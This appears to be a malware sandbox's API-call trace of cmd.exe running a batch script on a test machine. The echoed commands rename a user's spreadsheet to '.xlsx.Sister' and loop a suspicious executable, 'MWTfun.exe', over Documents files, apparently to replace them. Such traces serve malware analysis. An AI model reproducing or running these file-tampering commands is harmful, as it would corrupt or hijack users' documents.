_BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0304.957] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.957] GetFileType (hFile=0x50) returned 0x2 [0304.957] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.957] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0304.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.958] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0304.958] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.959] GetFileType (hFile=0x50) returned 0x2 [0304.959] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.959] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0304.959] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.959] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d2b650*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d2b650*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0304.960] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0304.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.960] GetFileType (hFile=0x50) returned 0x2 [0304.960] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.960] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0304.960] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.960] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0304.973] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0304.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.973] GetFileType (hFile=0x50) returned 0x2 [0304.973] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.973] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0304.978] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.978] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0304.985] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0304.986] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0304.986] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0304.986] malloc (_Size=0xffce) returned 0x21eda21fdc0 [0304.986] ??_V@YAXPEAX@Z () returned 0x21eda21fdc0 [0304.986] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0304.986] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0304.986] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0304.986] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0304.986] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0304.986] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0304.986] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0304.986] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0304.986] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0304.986] ??_V@YAXPEAX@Z () returned 0x1 [0304.986] GetProcessHeap () returned 0x21ed8c70000 [0304.986] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5fbe0 [0304.986] GetProcessHeap () returned 0x21ed8c70000 [0304.986] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5fbe0, Size=0x130) returned 0x21ed93b2bf0 [0304.987] GetProcessHeap () returned 0x21ed8c70000 [0304.987] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b2bf0) returned 0x130 [0304.987] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0304.987] malloc (_Size=0xffce) returned 0x21eda21fdc0 [0304.987] ??_V@YAXPEAX@Z () returned 0x21eda21fdc0 [0304.987] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0304.987] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda21fdc0, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0304.990] ??_V@YAXPEAX@Z () returned 0x1 [0304.990] GetProcessHeap () returned 0x21ed8c70000 [0304.990] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed93b20b0 [0304.990] GetProcessHeap () returned 0x21ed8c70000 [0304.990] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5eda0 [0304.990] GetProcessHeap () returned 0x21ed8c70000 [0304.990] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5eda0, Size=0x130) returned 0x21ed93b17f0 [0304.990] GetProcessHeap () returned 0x21ed8c70000 [0304.990] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b17f0) returned 0x130 [0304.990] malloc (_Size=0xffce) returned 0x21eda21fdc0 [0304.991] ??_V@YAXPEAX@Z () returned 0x21eda21fdc0 [0304.991] GetProcessHeap () returned 0x21ed8c70000 [0304.991] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7540 [0304.991] GetProcessHeap () returned 0x21ed8c70000 [0304.991] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5aee0 [0304.991] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0304.991] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0304.991] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.991] GetLastError () returned 0x2 [0304.991] GetProcessHeap () returned 0x21ed8c70000 [0304.991] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9300000 [0304.991] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9300010 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.992] SetErrorMode (uMode=0x0) returned 0x0 [0304.992] SetErrorMode (uMode=0x1) returned 0x0 [0304.992] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda21fdc0, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0304.992] SetErrorMode (uMode=0x0) returned 0x1 [0304.992] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0304.992] GetProcessHeap () returned 0x21ed8c70000 [0304.992] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d58f30 [0304.992] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0304.992] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0304.993] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.993] GetLastError () returned 0x2 [0304.993] ??_V@YAXPEAX@Z () returned 0x1 [0304.993] malloc (_Size=0xffce) returned 0x21eda21fdc0 [0304.993] ??_V@YAXPEAX@Z () returned 0x21eda21fdc0 [0304.993] malloc (_Size=0xffce) returned 0x21eda22fda0 [0304.993] ??_V@YAXPEAX@Z () returned 0x21eda22fda0 [0304.993] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.993] GetLastError () returned 0x2 [0304.993] _get_osfhandle (_FileHandle=2) returned 0x54 [0304.993] GetFileType (hFile=0x54) returned 0x2 [0304.993] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0304.993] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0304.998] _get_osfhandle (_FileHandle=2) returned 0x54 [0304.999] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0304.999] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0304.999] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0304.999] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0305.006] longjmp () [0305.006] ??_V@YAXPEAX@Z () returned 0x1 [0305.006] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb445ea20, ftCreationTime.dwHighDateTime=0x1d5e0de, ftLastAccessTime.dwLowDateTime=0xfb24acd0, ftLastAccessTime.dwHighDateTime=0x1d587db, ftLastWriteTime.dwLowDateTime=0xfb24acd0, ftLastWriteTime.dwHighDateTime=0x1d587db, nFileSizeHigh=0x0, nFileSizeLow=0x1dea, dwReserved0=0xa0000003, dwReserved1=0xe68ac9ea, cFileName="O-Jp_px2B.xlsx", cAlternateFileName="")) returned 1 [0305.006] GetProcessHeap () returned 0x21ed8c70000 [0305.006] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c758a0, Size=0x186) returned 0x21ed8c758a0 [0305.006] GetProcessHeap () returned 0x21ed8c70000 [0305.006] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c758a0) returned 0x186 [0305.006] GetProcessHeap () returned 0x21ed8c70000 [0305.006] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2bb20 [0305.007] GetProcessHeap () returned 0x21ed8c70000 [0305.007] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2bb20, Size=0x30) returned 0x21ed8d2bb20 [0305.007] GetProcessHeap () returned 0x21ed8c70000 [0305.007] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2bb20) returned 0x30 [0305.007] GetProcessHeap () returned 0x21ed8c70000 [0305.007] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2bb60 [0305.007] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.007] GetProcessHeap () returned 0x21ed8c70000 [0305.007] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2e) returned 0x21ed8cc8950 [0305.008] ??_V@YAXPEAX@Z () returned 0x1 [0305.008] GetProcessHeap () returned 0x21ed8c70000 [0305.008] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2bb60, Size=0x160) returned 0x21ed8d2bb60 [0305.008] GetProcessHeap () returned 0x21ed8c70000 [0305.008] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2bb60) returned 0x160 [0305.008] GetProcessHeap () returned 0x21ed8c70000 [0305.008] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2bcd0 [0305.008] GetProcessHeap () returned 0x21ed8c70000 [0305.008] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2bcd0, Size=0x290) returned 0x21ed8d2bcd0 [0305.008] GetProcessHeap () returned 0x21ed8c70000 [0305.008] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2bcd0) returned 0x290 [0305.008] GetProcessHeap () returned 0x21ed8c70000 [0305.008] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2bf70 [0305.008] GetProcessHeap () returned 0x21ed8c70000 [0305.008] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2bf70, Size=0x30) returned 0x21ed8d2bf70 [0305.008] GetProcessHeap () returned 0x21ed8c70000 [0305.008] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2bf70) returned 0x30 [0305.008] GetProcessHeap () returned 0x21ed8c70000 [0305.008] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d2bfb0 [0305.023] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.023] GetProcessHeap () returned 0x21ed8c70000 [0305.024] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2e) returned 0x21ed8cc8610 [0305.024] ??_V@YAXPEAX@Z () returned 0x1 [0305.024] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0305.024] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc7300 [0305.024] FindClose (in: hFindFile=0x21ed8cc7300 | out: hFindFile=0x21ed8cc7300) returned 1 [0305.024] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7060 [0305.025] FindClose (in: hFindFile=0x21ed8cc7060 | out: hFindFile=0x21ed8cc7060) returned 1 [0305.025] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe05d9f02, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xe05d9f02, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x7, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x21ed8cc73c0 [0305.025] FindClose (in: hFindFile=0x21ed8cc73c0 | out: hFindFile=0x21ed8cc73c0) returned 1 [0305.025] _wcsnicmp (_String1="DOCUME~1", _String2="Documents", _MaxCount=0x9) returned 16 [0305.025] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\O-Jp_px2B.xlsx", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb445ea20, ftCreationTime.dwHighDateTime=0x1d5e0de, ftLastAccessTime.dwLowDateTime=0xfb24acd0, ftLastAccessTime.dwHighDateTime=0x1d587db, ftLastWriteTime.dwLowDateTime=0xfb24acd0, ftLastWriteTime.dwHighDateTime=0x1d587db, nFileSizeHigh=0x0, nFileSizeLow=0x1dea, dwReserved0=0x4, dwReserved1=0x7, cFileName="O-Jp_px2B.xlsx", cAlternateFileName="O-JP_P~1.XLS")) returned 0x21ed8cc7720 [0305.025] FindClose (in: hFindFile=0x21ed8cc7720 | out: hFindFile=0x21ed8cc7720) returned 1 [0305.026] _wcsnicmp (_String1="O-JP_P~1.XLS", _String2="O-Jp_px2B.xlsx", _MaxCount=0xe) returned 6 [0305.026] malloc (_Size=0x1ff9c) returned 0x21eda23fd80 [0305.026] ??_V@YAXPEAX@Z () returned 0x21eda23fd80 [0305.028] GetProcessHeap () returned 0x21ed8c70000 [0305.028] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x24) returned 0x21ed8d45da0 [0305.028] ??_V@YAXPEAX@Z () returned 0x1 [0305.028] ??_V@YAXPEAX@Z () returned 0x1 [0305.028] GetProcessHeap () returned 0x21ed8c70000 [0305.028] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d2bfb0, Size=0x158) returned 0x21ed8d2bfb0 [0305.028] GetProcessHeap () returned 0x21ed8c70000 [0305.029] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d2bfb0) returned 0x158 [0305.029] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0305.029] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.029] GetFileType (hFile=0x50) returned 0x2 [0305.029] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.029] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0305.030] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.030] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0305.037] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0305.037] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0305.041] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0305.041] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.041] GetFileType (hFile=0x50) returned 0x2 [0305.041] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.041] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0305.042] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.042] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x1a) returned 1 [0305.042] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.042] GetFileType (hFile=0x50) returned 0x2 [0305.042] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.042] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.043] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.043] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d2bb30*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d2bb30*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.043] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"O-Jp_px2B.xlsx\" \"O-Jp_px2B.xlsx.Sister\" ") returned 42 [0305.043] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.043] GetFileType (hFile=0x50) returned 0x2 [0305.043] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.044] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.044] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.044] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2a, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x2a) returned 1 [0305.044] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0305.045] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.045] GetFileType (hFile=0x50) returned 0x2 [0305.045] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.045] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.046] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.046] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.047] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0305.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.047] GetFileType (hFile=0x50) returned 0x2 [0305.047] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.047] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.047] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.047] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0305.048] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0305.048] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.048] GetFileType (hFile=0x50) returned 0x2 [0305.048] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.048] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.049] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0305.049] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0305.049] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.049] GetFileType (hFile=0x50) returned 0x2 [0305.049] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.050] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0305.050] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.050] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0305.057] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.057] GetFileType (hFile=0x50) returned 0x2 [0305.057] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.057] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0305.058] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.058] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d2bf80*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d2bf80*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0305.059] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"O-Jp_px2B.xlsx.Sister\" \"O-Jp_px2B.bat\" ") returned 41 [0305.059] _get_osfhandle (_FileHandle=1) returned 0x50 [0305.059] GetFileType (hFile=0x50) returned 0x2 [0305.059] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0305.059] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 